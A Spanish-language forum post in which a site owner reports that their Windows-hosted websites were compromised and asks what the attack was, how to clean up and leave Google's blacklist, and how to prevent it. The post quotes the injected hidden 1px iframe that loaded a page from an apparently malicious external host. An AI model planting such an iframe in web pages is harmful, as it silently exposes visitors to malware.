En esta ocacion para consultar con ustedes un problema que he tenido en unos servidores, hace unos día tube un ataque a unos sitios que tengo en estos servidores, todos los nombres de los archivos están iguales, pero el contenido era distinto.
Dentro de ello habian 2 lineas similares a estas:
Código:
<iframe width="1px" height="1px" src="http://ishigo.sytes.ne
t/openstat/appropriate/promise-ourselves.php" style="display
:block;" >
Restaure toda la informacion y 2 dias despues google me bloqueo el sitio por tener contenido malicioso, al revisar el index, footer y header del sitio en las ultimas lineas contenía el código anterior.
Actualmente estoy cambiando los sitios a otros servidores, para desechar estos con lo que tengo problemas.
Pero me surgen las siguientes dudas.
1.- Que tipo de ataque a sido este?
2.- Como saber si realmente la información esta limpia al pasarla al otro servidor y poder salir de la lista negra de google
3.- Como prevenir estos acontecimientos.
Realmente me sentí muy vulnerable, yo he usado linux mas de 10 años hacia atrás, y es mi primera ves que uso windows por requerimiento de estos sitios y no pude encontrar la solución del error.
Saludos y gracias por sus comentarios